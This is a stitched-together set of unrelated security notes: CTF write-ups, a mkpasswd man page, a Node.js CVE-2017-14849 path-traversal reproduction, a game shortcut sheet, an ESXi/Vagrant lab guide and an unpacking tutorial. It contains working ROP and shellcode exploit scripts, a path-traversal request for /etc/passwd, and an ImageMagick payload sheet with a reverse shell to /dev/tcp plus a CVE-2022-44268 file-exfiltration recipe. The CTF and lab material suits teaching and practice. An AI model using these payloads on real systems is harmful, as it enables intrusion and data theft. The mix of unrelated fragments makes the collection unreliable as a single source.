# @ .data + 8 p += pack('<I', 0x0806f02a) # pop edx ; ret p += pack('<I', 0x080ea068) # @ .data + 8 p += pack('<I', 0x08049303) # xor eax, eax ; ret p += pack('<I', 0x0807a86f) # inc eax ; ret p += pack('<I', 0x0807a86f) # inc eax ; ret p += pack('<I', 0x0807a86f) # inc eax ; ret p += pack('<I', 0x0807a86f) # inc eax ; ret p += pack('<I', 0x0807a86f) # inc eax ; ret p += pack('<I', 0x0807a86f) # inc eax ; ret p += pack('<I', 0x0807a86f) # inc eax ; ret p += pack('<I', 0x0807a86f) # inc eax ; ret p += pack('<I', 0x0807a86f) # inc eax ; ret p += pack('<I', 0x0807a86f) # inc eax ; ret p += pack('<I', 0x0807a86f) # inc eax ; ret p += pack('<I', 0x0806cc25) # int 0x80 ``` We simply need to plug this into our script, and there's almost nothing left to do: ```python from pwn import * import struct import argparse import os EXECUTABLE = "gets" LOCAL_PATH = "./" REMOTE_PATH = "/problems/can-you-gets-me_1_e66172cf5b6d25fffee62caf02c24c3d/" SSH_SERVER = "2018shell3.picoctf.com" def get_process_path(is_ssh = False): if is_ssh or os.path.exists(REMOTE_PATH): return REMOTE_PATH + EXECUTABLE else: return LOCAL_PATH + EXECUTABLE def get_process(ssh_user = None): is_ssh = ssh_user is not None path = get_process_path(is_ssh) params = {"argv": path, "cwd": os.path.dirname(path)} if is_ssh: s = ssh(host=SSH_SERVER, user=ssh_user) p = s.process(**params) else: p = process(**params) return p def send_payload(proc, payload): proc.sendlineafter("GIVE ME YOUR NAME!\n", payload) def get_overflow_offset(): # It's problematic to create a core dump on an NTFS file system, # so reconfigure core dumps to be created elsewhere os.system("echo ~/core/core_dump > /proc/sys/kernel/core_pattern") proc = process(get_process_path()) payload = cyclic(100) send_payload(proc, payload) proc.wait() offset = cyclic_find(proc.corefile.eip) log.info("Overflow offset: {}".format(offset)) return offset def get_rop(overflow_offset): # execve generated by ROPgadget p = "" p += struct.pack('<I', 0x0806f02a) # pop edx ; ret p += struct.pack('<I', 0x080ea060) # @ .data p += struct.pack('<I', 0x080b81c6) # pop eax ; ret p += '/bin' p += struct.pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret p += struct.pack('<I', 0x0806f02a) # pop edx ; ret p += struct.pack('<I', 0x080ea064) # @ .data + 4 p += struct.pack('<I', 0x080b81c6) # pop eax ; ret p += '//sh' p += struct.pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret p += struct.pack('<I', 0x0806f02a) # pop edx ; ret p += struct.pack('<I', 0x080ea068) # @ .data + 8 p += struct.pack('<I', 0x08049303) # xor eax, eax ; ret p += struct.pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret p += struct.pack('<I', 0x080481c9) # pop ebx ; ret p += struct.pack('<I', 0x080ea060) # @ .data p += struct.pack('<I', 0x080de955) # pop ecx ; ret p += struct.pack('<I', 0x080ea068) # @ .data + 8 p += struct.pack('<I', 0x0806f02a) # pop edx ; ret p += struct.pack('<I', 0x080ea068) # @ .data + 8 p += struct.pack('<I', 0x08049303) # xor eax, eax ; ret p += struct.pack('<I', 0x0807a86f) # inc eax ; ret p += struct.pack('<I', 0x0807a86f) # inc eax ; ret p += struct.pack('<I', 0x0807a86f) # inc eax ; ret p += struct.pack('<I', 0x0807a86f) # inc eax ; ret p += struct.pack('<I', 0x0807a86f) # inc eax ; ret p += struct.pack('<I', 0x0807a86f) # inc eax ; ret p += struct.pack('<I', 0x0807a86f) # inc eax ; ret p += struct.pack('<I', 0x0807a86f) # inc eax ; ret p += struct.pack('<I', 0x0807a86f) # inc eax ; ret p += struct.pack('<I', 0x0807a86f) # inc eax ; ret p += struct.pack('<I', 0x0807a86f) # inc eax ; ret p += struct.pack('<I', 0x0806cc25) # int 0x80 return fit({overflow_offset: p}) parser = argparse.ArgumentParser() parser.add_argument("-s", "--ssh_user", help="Connect via SSH with the given username") args = parser.parse_args() context.binary = get_process_path() offset = get_overflow_offset() payload = get_rop(offset) p = get_process(args.ssh_user) send_payload(p, payload) p.interactive() ``` The output: ```console root@kali:/media/sf_CTFs/pico/can-you-gets-me# python exploit.py --ssh_user=$pico_ssh_user [*] '/media/sf_CTFs/pico/can-you-gets-me/gets' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) [+] Starting local process './gets': pid 994 [*] Process './gets' stopped with exit code -11 (SIGSEGV) (pid 994) [+] Parsing corefile...: Done [*] '/media/sf_CTFs/pico/can-you-gets-me/core.994' Arch: i386-32-little EIP: 0x61616168 ESP: 0xff8c6b60 Exe: '/media/sf_CTFs/pico/can-you-gets-me/gets' (0x8048000) Fault: 0x61616168 [*] Overflow offset: 28 [+] Connecting to 2018shell3.picoctf.com on port 22: Done [*] user@2018shell3.picoctf.com: Distro Ubuntu 16.04 OS: linux Arch: amd64 Version: 4.4.0 ASLR: Enabled [+] Starting remote process '/problems/can-you-gets-me_1_e66172cf5b6d25fffee62caf02c24c3d/gets' on 2018shell3.picoctf.com: pid 52148 [*] Switching to interactive mode $ $ ls flag.txt gets gets.c $ $ cat flag.txt picoCTF{rOp_yOuR_wAY_tO_AnTHinG_700e9c8e}$ $ exit [*] Got EOF while reading in interactive $ [*] Stopped remote process 'gets' on 2018shell3.picoctf.com (pid 52148) [*] Got EOF while sending in interactive ``` The flag: picoCTF{rOp_yOuR_wAY_tO_AnTHinG_700e9c8e}
sec-knowleage
## QR Puzzle: Web (Unknown, 400p) Solve the slide puzzle and decode the QR code. http://puzzle.quals.seccon.jp:42213/slidepuzzle ###PL [ENG](#eng-version) Podobnie jak w poprzednich QR Puzzle dostajemy QR code i mamy go rozwiązać. Tym razem problemem jest to, że brakuje fragmentu kodu. ![](screen.png) Z czasem zadania robią się coraz trudniejsze - na początku brakuje zawsze prawego dolnego rogu kodu, później również krawędzi, później środka, a na końcu może brakować również innego rogu (co okazało się problematyczne). Dość oczywisty jest cel zadania - należy napisać program który złoży taki QR code, rozwiąże go, oraz wyśle do programu. Wykorzystaliśmy do tego solver z poprzedniego zadania QR Puzzle, jedynie nieznacznie musieliśmy przerobić funkcje pobierającą obrazki z ekranu, oraz nie wysyłaliśmy rozwiązań a przeklejaliśmy ręcznie. Kodu jest za dużo by omawiać go funkcja po funkcji, ale działa prawie identycznie jak w zadaniu [QR puzzle: Windows](https://github.com/p4-team/ctf/tree/master/2015-12-05-seccon/qr_windows_200) - ma jedynie kilka poprawek. Flaga: SECCON{U_R_4_6R347_PR06R4MM3R!} ### ENG version We are given qr code, and we have to unscramble it - just like in earlier qr puzzle challenge. It's harder now, because there is much more fragments, and one piece is missing. ![](screen.png) Qr codes are getting harder with time - at the beggining missing piece is always lower right corner, but later we can expect also missing edge, missing central piece, or even missing another corner (worst case scenario). It's obvious what task authors are expecting from us - we kave to write program that assembles such QR code, solve it, and then sends it to server. We used our solver from previons challenge - we only had to slightly rework function that captured qr code, and we didn't sent solutions automatically (it had to be done manually). There is too much code to go through it function by function, but it is almost identical as in [QR puzzle: Windows](https://github.com/p4-team/ctf/tree/master/2015-12-05-seccon/qr_windows_200) challenge - we only fixed few minor things. Flag: SECCON{U_R_4_6R347_PR06R4MM3R!}
sec-knowleage
## MeowMeow 75 (misc, 75p) ![alt text](screenshot.png) ### PL [ENG](#eng-version) Dostajemy [dziwny plik tekstowy](meowmeow) z różnymi wyrażeniami typu `((_____ << __) + _)` Jeśli ktoś robił cokolwiek w C to pewnie rozpozna syntax tego języka. `A << B` odpowiada przesunięciu `A` o `B` bitów w lewo, a `A + B` i `(...)` chyba nie muszę tłumaczyć :) Tak więc za dane podkreślenie podstawiamy jego długość i [wszystko uruchamiamy](solve.py). Dostajaemy długą liczbę `0xa7d30363063346262616338356133653036663535303863343836616531653138397b53495341L`, zamieniamy ją na text i dostajemy `}060c4bbac85a3e06f5508c486ae1e189{SISA` ### ENG version In this task, we're presented with a [weird-looking text file](meowmeow) with various expressions like `((_____ << __) + _)` If you've done almost anything in C then you should notice that this is a valid C code. `A << B` corresponds to left bitwise shift, I don't think I have to explain how `A + B` and `(...)` work :) So we swap each underline with it's length and try to run [the code](solve.py). We get this quite long hex number:`0xa7d30363063346262616338356133653036663535303863343836616531653138397b53495341L`, covert it to text and you get a reversed flag `}060c4bbac85a3e06f5508c486ae1e189{SISA`
sec-knowleage
.TH MKPASSWD 1 "22 August 1994" .SH NAME mkpasswd \- 为用户产生新口令 .SH 总览 SYNOPSIS .B mkpasswd .I [ .I args ] [ .I user ] .SH 介绍 INTRODUCTION .B mkpasswd 为用户产生口令并自动应用。它是基于O'Reilly的书\fI《Exploring Expect》\fR第23章中的代码的。 .SH 用法 USAGE 不带参数的话, .B mkpasswd 返回一个新口令。带上用户名的话, .B mkpasswd 为该用户分配一个新口令。 .PP 根据以下的标志可以随机性的产生口令。 .SH 标志 FLAGS .B \-l 标志定义口令长度。缺省值为9。以下示例建立一个20位的口令。 mkpasswd -l 20 .B \-d 标志定义口令必须包含的最少数字位数。缺省值为2。以下示例建立一个含3位数字的口令。 mkpasswd -d 3 .B \-c 标志定义口令必须包含的最少小写字母个数。缺省值为2。 .B \-C 标志定义口令必须包含的最少大写字母个数。缺省值也是2。 The .B \-s flag defines the minimum number of special characters that must be in the password. The default is 1. .B \-p 标志标明设立口令的程序。如果/etc/yppasswd存在的话则它为缺省值,否则就用/bin/passwd。 .B \-2 标志交换键盘上左右手的字母(我想就是左手输入g则为h吧),以使别人更难监视输入的口令。这也使口令猜测程序更容易成功。(这句不懂,请高手指教!) .B \-v 使设定口令的交互可见,但缺省是不可见的。 .SH 示例 EXAMPLE 以下示例建立一个15位包含至少3位数字和5位大写字符的口令。 mkpasswd -l 15 -d 3 -C 5 .SH 另见 SEE ALSO .I Don Libes所写的由O'Reilly and Associates于1995年一月出版的 《Exploring Expect: A Tcl-Based Toolkit for Automating Interactive Programs》 一书。 .SH 作者 AUTHOR Don Libes,国家标准与技术学会(NIST) .B mkpasswd 是公共域软件。如果本程序或者它的部分有用的话,将是NIST和我的荣誉。 .SH [中文版维护人] .B meaculpa <meaculpa@21cn.com> .SH [中文版最新更新] .B 2001/02/24 .SH "《中国linux论坛man手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
# Node.js 目录穿越漏洞(CVE-2017-14849) ## 漏洞原理 参考文档: - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ - https://security.tencent.com/index.php/blog/msg/121 原因是 Node.js 8.5.0 对目录进行`normalize`操作时出现了逻辑错误,导致向上层跳跃的时候(如`../../../../../../etc/passwd`),在中间位置增加`foo/../`(如`../../../foo/../../../../etc/passwd`),即可使`normalize`返回`/etc/passwd`,但实际上正确结果应该是`../../../../../../etc/passwd`。 express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于`normalize`函数。比如,express在判断path是否超出静态目录范围时,就用到了`normalize`函数,上述BUG导致`normalize`函数返回错误结果导致绕过了检查,造成任意文件读取漏洞。 当然,`normalize`的BUG可以影响的绝非仅有express,更有待深入挖掘。不过因为这个BUG是node 8.5.0 中引入的,在 8.6 中就进行了修复,所以影响范围有限。 ## 漏洞复现 编译及运行环境: ``` docker compose build docker compose up -d ``` 访问`http://your-ip:3000/`即可查看到一个web页面,其中引用到了文件`/static/main.js`,说明其存在静态文件服务器。 发送如下数据包,即可读取passwd: ``` GET /static/../../../a/../../../../etc/passwd HTTP/1.1 Host: your-ip:3000 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close ``` ![](1.png)
sec-knowleage
--- title: Apex Legends date: 2022-11-23 16:23:31.706352 background: bg-[#a74145] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 27 default keyboard shortcuts found in Apex Legends --- Keyboard Shortcuts ------------------ ### Movement Shortcut | Action ---|--- `W` | Move forward `S` | Move back `A` | Move left `D` | Move right `Left Shift` | Sprint `Space` | Jump `C` | Toggle crouch `Left Ctrl` | Hold to crouch {.shortcuts} ### Weapons and Abilities Shortcut | Action ---|--- `Q` | Tactical ability `Z` | Ultimate ability `E` | Interact or pickup `X` | Alternate interact `Tab` | Toggle inventory `M` | Toggle map `B` | Toggle fire mode `V` | Melee `R` | Reload `1` | Equip first weapon `2` | Equip second weapon `3` | Holster weapons `G` | Equip grenade `4` | Use selected health item `H` | Toggle Gibraltar's shield `N` | Inspect weapon {.shortcuts} ### Communication Shortcut | Action ---|--- `F` | Ping enemy here `T` | Hold to use push to talk `Enter` | Message team {.shortcuts} Also see -------- - [Keyboard shortcuts for Apex Legends](https://www.metabomb.net/off-meta/gameplay-guides/apex-legends-controls-pc-playstation-4xbox-one) _(www.metabomb.net)_
sec-knowleage
# 使用ESXI和Vagrant搭建实验环境 ## 环境设计 ESXi 6.5安装在物理机上,在隔离的虚拟网络上有多个VM。虚拟防火墙是内部网络的边界,并提供VPN访问。VPN访问将设置为直接连接到网络,但不提供域用户。 ##域设计 暂无 ## 服务计划 ``` 主机名 角色 OS DC01 域控制器 Server 2012 R2 FS01 文件服务器 Server 2008 R2 WEB01 网络服务器 Server 2016 Tech Eval WS01 工作站 W10企业版 WS02 工作站 W7企业版 CENT01 linux box CentOS 7.4 FW01 防火墙 pfSense ``` ## 准备 安装所有软件要求并下载必要的ISO。它们可以从MS评估中心或[The-Eye](https://the-eye.eu/public/MSDN/)获得。 ## 硬件要求 - ESXi 6.5兼容的硬件(如果不兼容,可以使用6.0) - 最低32 GB RAM - ESXi驱动器 - 仅需8 GB - 实际VM的驱动器 - 500 GB + - 用于安装ESXi的USB驱动器 - 最小1 GB - 需要一台独立的计算机来管理 ## 软件要求 VMware - ESXi的6.5版本 - VMware Workstation 1x.x.--版本,最新是14.0 - VMware的 ovftool - vCenter - vSphere客户端 ## Orchestration - [​Vagrant​]() - Vagrant VMware ESXi 的插件- [josenk/vagrant-vmware-esxi: Vagrant 的一个插件增加了VMware的ESXi支持](https://github.com/josenk/vagrant-vmware-esxi) - Vagrant 刷新重载 - [aidanns](https://github.com/aidanns)/[vagrant-reload​](https://github.com/aidanns/vagrant-reload) - Vagrant WinRM 文件夹同步- [Cimpress-MCP](https://github.com/Cimpress-MCP)/[vagrant-winrm-syncedfolders​](https://github.com/Cimpress-MCP/vagrant-winrm-syncedfolders) > 译者注:以上工具我也没用过,可自行通过gayhub了解怎么玩。 ISOs ## ISO - Windows Server 2012 R2 - Windows Server 2016 - Windows 7企业版 - Windows 10企业版 - CentOS 7.4 ## 安装ESXI 下载ESXI 6.5映像 - 使用[Rufus](http://rufus.akeo.ie/)从ESXI 镜像中制作一个可启动的USB key。 - 通过USB引导按照实验靶机,并按照说明在小型驱动器上安装ESXi。 -安装后,重新启动服务器。ESXi现在应该有可以从Web面板访问DHCP租用的IP地址。 - 此时设置静态IP避免ESXi网络适配器的IP在您执行操作时不断更改。 ## 故障排除 故障排除与写入速度的SSD:https://communities.vmware.com/thread/554004 ESXi 6.5包含用于SATA AHCI控制器的新本机驱动程序(vmw_ahci),但这会导致许多控制器或者磁盘出现性能问题。 尝试禁用本机驱动程序并通过cmd恢复到较旧的sata-ahci驱动程序 ``` esxcli system moduleset--enabled=false--module=vmw_ahci ``` ## 启用ESXi shell和SSH Vagrant ESXi插件需要SSH才能启用。 - 在ESXi主机的控制台上,按F2出现提示:提供凭据。 - 滚动到`故障排除选项`,然后按Enter键。 - 选择`启用ESXi shell`和`启用SSH`,然后在每个按Enter键一次 - 按Esc返回主控制台屏幕。 ## 将数据存储添加到ESXi - 添加大型驱动器,虚拟机将作为数据存储区存储在ESXi中。 - 在ESXi Web客户端中,按左侧窗格中的Storage - 从菜单中选择后,按照说明操作---->New datastore - 添加一个驱动器,给它命名,并将整个驱动器用作一个分区。 ## 将网络配置添加到ESXi 在左侧窗格中选择`网络` - 单击`添加标准交换机`,将其命名为`vSwitch1` - 单击端口组,ADD端口组。 - 指定名称,将其分配给默认的虚拟交换机。Lab NetworkVLAN 0vSwitch0 ## 安装Vagrant 安装Vagrant和插件 ``` vagrant plugin install vagrant-vmware-esxi vagrant plugin install vagrant-winrm-syncedfolders vagrant plugin install vagrant-reload ​ vagrant plugin list vagrant-reload (0.0.1) vagrant-vmware-esxi (2.3.1) vagrant-winrm-syncedfolders (1.0.1) ``` (新方法) - 使用Packer构建VM Packer帮助我们自动化将镜像准备好然后部署到虚拟机。 (旧方法) - 在Vagrant中下载操作系统 使用以下命令使用Vagrant下载所需的操作系统。出现提示时选择提供程序。建议从Vagrant的云服务器中选择没有内置任何配置管理的主机是。这些通常表示为。 ``` vmware_desktop nocm ``` ``` vagrant box add opentable/win-2008r2-enterprise-amd64-nocm vagrant box add opentable/win-2012r2-standard-amd64-nocm vagrant box add StefanScherer/windows_2016 vagrant box add opentable/win-7-enterprise-amd64-nocm vagrant box add StefanScherer/windows_10` ``` https://app.vagrantup.com/opentable/boxes/win-2008r2-enterprise-amd64-nocm https://app.vagrantup.com/opentable/boxes/win-2012-standard-amd64-nocm https://app.vagrantup.com/StefanScherer/boxes/windows_2016 https://app.vagrantup.com/opentable/boxes/win-7-enterprise-amd64-nocm https://app.vagrantup.com/StefanScherer/boxes/windows_10 ## 老方法就是为每个系统准备镜像 虽然是麻烦了一点,但是可以减少配环境的劳动力。 - 建一个目录,命名为`PrepSever2016`。将VM的整个目录复制到新目录---`vagrant.d/boxes/repoNameOfVM` - 在Workstation中引导VM之前,请设置文件共享,因为必须将文件传输到这个机器。 - 设置网络适配器,就可以在本地Web服务器或Github上托管文件,方便下载到该机器中。 - 继续在VM中启动机器并准备以下内容: 1.修复帐户 启用本地管理员帐户并删除Vagrant帐户 - 控制面板 - >用户帐户 - >管理另一个帐户 - >管理员 - >设置管理员帐户的密码 - >注销 - 使用新密码以管理员身份登录,进入控制面板 - >用户 - >删除用户帐户 - >删除流Vagant帐户 - >单击删除 2. 安装VMware Tools 通过VMware workstation界面完成。 3. Windows Update 使用WU.ps1脚本下载并安装操作系统的更新。 以管理员身份打开powershell.exe并运行 ``` Import-Module C:\Users\Administrator\Desktop\WU.ps1 ``` 在重新启动之前,必须多次执行此操作,直到无法再应用更新。只要继续运行它,直到没有了更多更新。 4.安装.Net框架 5.运行Sysprep Sysprep将通过此处提供的XML文件完成:link (译者注:忘记加了链接) - 将管理员和自动登录密码更改为正确的密码 - 更改时区。在这里查找微软时区值:https://msdn.microsoft.com/en-us/library/ms912391(v=winembedded.11).aspx - 使用以下命令执行sysprep。 ``` C:\Windows\system32\sysprep\sysprep.exe /generalize /oobe /shutdown /unattend:c:\users\Administrator\Desktop\sysprep.xml ``` 6.验证 现在应该关闭VM,我们想验证一切是否按预期工作。 - 转到VM - >管理 - >克隆 - >完全克隆VM。(需要很长时间) - 引导克隆的vm并验证是否已正确设置所有内容。 - 关闭并删除克隆或将其作为基础镜像。 - 制作已修复的VM的副本并将其放入文件夹中。 - 将文件夹重命名为Server2016或您喜欢的任何名称。 - 如果您的磁盘空间不足,则可以删除从Vagrant云服务或一开始下载的原始VM,请注意,如果出现问题,可能需要稍后使用它们。 - 拍快照,拍快照。 ## 使用Vagrant部署VM 初始化Vagant 这个以及其他文件创建了非常重要的Vagrantfile,它保存了部署配置。 ``` vagrant init ``` Vagrantfile配置 vmware esxi插件的文档包含示例和配置。 ``` https://github.com/josenk/vagrant-vmware-esxi/wiki/Vagrantfile-examle:-Single-Machine,-fully-documented。 ``` ``` https://www.vagrantup.com/docs/vagrantfile/machine_settings.html ``` 给自己的实验靶机做一个标签,所以你可以有多个BOX,其实你的整个实验环境就是一个Vagrantfile。 将BOX的名称和指针设置为您在先前步骤中下载的BOX。winrm参数指定应使用WinRM(powershell远程控制盒)进行部署。可以为向域中添加靶机,设置某些系统参数等任务添加许多powershell脚本,自动化准备系统。 esxi参数位于底部。主机名必须指向管理网络虚拟交换机接口,当然必须设置密码。 ``` Vagrant.configure("2") do |config| config.vm.synced_folder ".", "/vagrant", disabled: true ​ config.vm.define "WEB01" do |config| config.vm.box = "Server2016" config.vm.hostname="WEB01" config.vm.guest = :windows config.vm.communicator = "winrm" config.vm.synced_folder "C:\\Users\\chris\\Google Drive\\Hacking\\beelabs\\AD_Files", "C:\\windows\\temp", type: "winrm" config.vm.boot_timeout = 100 config.vm.graceful_halt_timeout = 100 config.winrm.timeout = 120 config.winrm.username = "Administrator" config.winrm.password = "PASSWORD" config.winrm.transport = :plaintext config.winrm.basic_auth_only = true config.vm.provision "shell", inline: "Rename-Computer -NewName WEB01" config.vm.provision :reload ​ config.vm.provider :vmware_esxi do |esxi| esxi.esxi_hostname = "10.0.0.10" esxi.esxi_username = "root" esxi.esxi_password = "PASSWORD" esxi_virtual_network = "Lab Network" esxi.esxi_disk_store = "VMs" esxi.guest_memsize = "2048" esxi.guest_numvcpus = "2" esxi.mac_address = ["00:50:56:3f:01:01"] end end end end ``` 然后部署机器运行 ``` vagrant status ``` 并修复最终的错误 然后部署机器运行 ``` vagrant up ``` 将使用Vagrantfile,应用它,并使用OVFtool使用上述插件将其部署到ESXi主机。 如果这个机器在部署之后关闭,需要在不配置它的情况下启动它的话,请执行以下内容 ``` vagrant up BOX01 --no-provision ``` 在部署和配置该机器之后,关闭它并拍摄快照。这也可以通过使用快照和回滚Vagrant来完成。 ``` vagrant snapshot push //拍快照 ``` ``` vagrant snapshot pop //回滚 ``` ``` vagrant snapshot list //列出快照 ``` END
sec-knowleage
# ImageMagick Exploits ## ImageTragik Exploit v1 Simple reverse shell ```powershell push graphic-context encoding "UTF-8" viewbox 0 0 1 1 affine 1 0 0 1 0 0 push graphic-context image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' pop graphic-context pop graphic-context ``` ## ImageTragik Exploit v2 Simple `id` payload ```powershell %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%id) currentdevice putdeviceprops ``` then use `convert shellexec.jpeg whatever.gif` ## CVE-2022-44268 Information Disclosure: embedded the content of an arbitrary remote file * Generate the payload ```ps1 apt-get install pngcrush imagemagick exiftool exiv2 -y pngcrush -text a "profile" "/etc/passwd" exploit.png ``` * Trigger the exploit by uploading the file. The backend might use something like `convert pngout.png pngconverted.png` * Download the converted picture and inspect its content with: `identify -verbose pngconverted.png` * Convert the exfiltrated data: `python3 -c 'print(bytes.fromhex("HEX_FROM_FILE").decode("utf-8"))'` ## Thanks to * [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
sec-knowleage
### 单步跟踪法概述 单步跟踪法的原理就是通过Ollydbg的步过(F8), 步入(F7)和运行到(F4)功能, 完整走过程序的自脱壳过程, 跳过一些循环恢复代码的片段, 并用单步进入确保程序不会略过OEP. 这样可以在软件自动脱壳模块运行完毕后, 到达OEP, 并dump程序. ### 单步跟踪法要点 1. 打开程序按F8单步向下, 尽量实现向下的jmp跳转 2. 会经常遇到大的循环, 这时要多用 F4 来跳过循环 3. 如果函数载入时不远处就是一个call(近call), 那么我们尽量不要直接跳过, 而是进入这个call 4. 一般跳转幅度大的jmp指令, 都极有可能是跳转到了原程序入口点(OEP) ### 单步跟踪法示例 示例程序可以点击此处下载: [1_trace.zip](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/unpack/example/1_trace.zip) 单步跟踪法其实就是一步一步尽量从程序入口点往下走, 在单步的过程中注意EIP不要跑偏了, 但是对于一些比较复杂的壳而言, 单步的过程会显得异常枯燥而且容易把自己绕晕. 所以单步跟踪也常用于分析一些关键代码部分(跟静态分析相结合), 而不是完全地从头分析到尾, 这有违逆向工程的理念. 用Ollydbg打开压缩包内的Notepad.exe, 停在了下图位置. 入口点是一个`pushad`保存所有寄存器状态到栈中, 随后便是一个`call`调用位于`0040D00A`处的函数. 调用后便无条件跳转到`459DD4F7`处, 之后的`push ebp`和`retn`显然没有任何意义. 像这种入口点附近就是一个`call`的我们称为`近call`, 对于近call我们选择步进, 按下F7(当然你也只能选择步进, 不然EIP就跑偏程序停止了). 步进后又是一个`call`, 我们继续步进, 按F7, 跟进后发现没有近call了, 我们可以看到程序在调`GetModuleHandleA`, `GetProcAddress`等API, 继续向下分析. 之后会遇到多个跳转,我们尽量满足向下的跳转,对于向上的跳转不予实现并利用F4跳出循环,直到`0040D3AF`处, 我们看以下的代码 ``` asm 0040D3AF 61 popad 0040D3B0 75 08 jnz short NotePad.0040D3BA 0040D3B2 B8 01000000 mov eax,0x1 0040D3B7 C2 0C00 retn 0xC 0040D3BA 68 CC104000 push NotePad.004010CC 0040D3BF C3 retn ``` 这里`popad`可以恢复在程序入口点处保存的寄存器状态, 然后`jnz`跳转到`0040D3BA`处, 这里是利用`push`和`retn`来将`EIP`改变为`004010CC`, 也就是说在壳解压完代码等资源完毕后, 将通过`jnz`跳转到`push`处, 然后通过`push`和`ret`将`EIP`设置为程序原来的入口点(OEP)并返回到OEP处, 然后继续执行原程序的代码. 我们执行到`retn`返回后 显然, 我们到了一堆被`Ollydbg`误认为是数据的地方继续执行, 显然`Ollydbg`分析错误了, 我们需要让`Ollydbg`重新分析, 我们可以右键选择`分析->从模块中删除分析`, 或是按下`ctrl+a`, 这时正确地显示出OEP处的汇编指令.
sec-knowleage
# slippery-shellcode Binary Exploitation, 200 points ## Description: > This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #define BUFSIZE 512 #define FLAGSIZE 128 void vuln(char *buf){ gets(buf); puts(buf); } int main(int argc, char **argv){ setvbuf(stdout, NULL, _IONBF, 0); // Set the gid to the effective gid // this prevents /bin/sh from dropping the privileges gid_t gid = getegid(); setresgid(gid, gid, gid); char buf[BUFSIZE]; puts("Enter your shellcode:"); vuln(buf); puts("Thanks! Executing from a random location now..."); int offset = (rand() % 256) + 1; ((void (*)())(buf+offset))(); puts("Finishing Executing Shellcode. Exiting now..."); return 0; } ``` ## Solution: This challenge is similar to last year's [shellcode](/2018_picoCTF/shellcode.md). The difference is that last year the program jumped to the start of the buffer, and this year it jumps to a random location within the first 256 bytes of the buffer. So, to overcome this, we prepend a *nop slide* to our shellcode. In other words, our payload will look like: ``` nop;nop;nop;...;nop;shellcode; ``` It doesn't matter where we fall within the nop-slide, we will execute `nop`s until we get to the shellcode. The script: ```python # First, generate a pwntools template using: # pwn template --host 2019shell1.picoctf.com --user dvdalt --path /problems/slippery-shellcode_1_56175d41b0400eb642e2d2f0658b0506/vuln #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: i386-32-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX disabled # PIE: No PIE (0x8048000) # RWX: Has RWX segments if shell is not None: shell.set_working_directory(os.path.dirname(remote_path)) io = start() shellcode = asm(shellcraft.sh()) io.recvuntil("Enter your shellcode:") payload = fit({256: shellcode}, filler = asm(shellcraft.nop())) io.sendline(payload) io.interactive() ``` Output: ```console root@kali:/media/sf_CTFs/pico/slippery-shellcode# python exploit.py [*] '/media/sf_CTFs/pico/slippery-shellcode/vuln' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments [+] Connecting to 2019shell1.picoctf.com on port 22: Done [*] dvdalt@2019shell1.picoctf.com: Distro Ubuntu 18.04 OS: linux Arch: amd64 Version: 4.15.0 ASLR: Enabled [+] Opening new channel: 'pwd': Done [+] Receiving all data: Done (13B) [*] Closed SSH channel with 2019shell1.picoctf.com [*] Working directory: '/tmp/tmp.YEGLF5P9Cq' [+] Opening new channel: 'ln -s /home/dvdalt/* .': Done [+] Receiving all data: Done (0B) [*] Closed SSH channel with 2019shell1.picoctf.com [*] Working directory: '/problems/slippery-shellcode_1_56175d41b0400eb642e2d2f0658b0506' [+] Starting remote process '/problems/slippery-shellcode_1_56175d41b0400eb642e2d2f0658b0506/vuln' on 2019shell1.picoctf.com: pid 1968939 [*] Switching to interactive mode \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90jhh///sh/bin\x89h\x814$ri1Qj\x04YQ1j\x0bX? Thanks! Executing from a random location now... $ $ ls flag.txt vuln vuln.c $ $ cat flag.txt picoCTF{sl1pp3ry_sh311c0d3_3898c0fe} ```
